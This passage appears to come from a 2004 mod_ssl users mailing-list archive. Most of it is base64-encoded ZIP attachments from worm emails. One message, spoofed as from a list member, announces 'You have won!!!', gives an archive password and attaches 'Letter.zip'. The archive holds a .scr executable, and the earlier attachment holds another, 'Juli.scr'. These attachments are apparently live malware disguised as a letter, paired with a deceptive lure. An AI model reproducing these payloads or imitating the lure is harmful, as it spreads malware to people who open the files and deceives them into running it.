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

----------dwhstqniutodpqohrxwf--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 19:05:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F0892A89A3; Thu,  4 Mar 2004 19:05:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from computer (c-24-9-115-186.client.comcast.net [24.9.115.186])
	by master.modssl.org (Postfix) with SMTP id 6F0F6A893B
	for ; Thu,  4 Mar 2004 19:05:17 +0100 (CET)
Date: Thu, 04 Mar 2004 11:05:15 -0700
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------uvmihhkjwkvwsgjtjjym"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------uvmihhkjwkvwsgjtjjym
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

You have won!!!

password:  55840

----------uvmihhkjwkvwsgjtjjym
Content-Type: application/octet-stream; name="Letter.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Letter.zip"

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
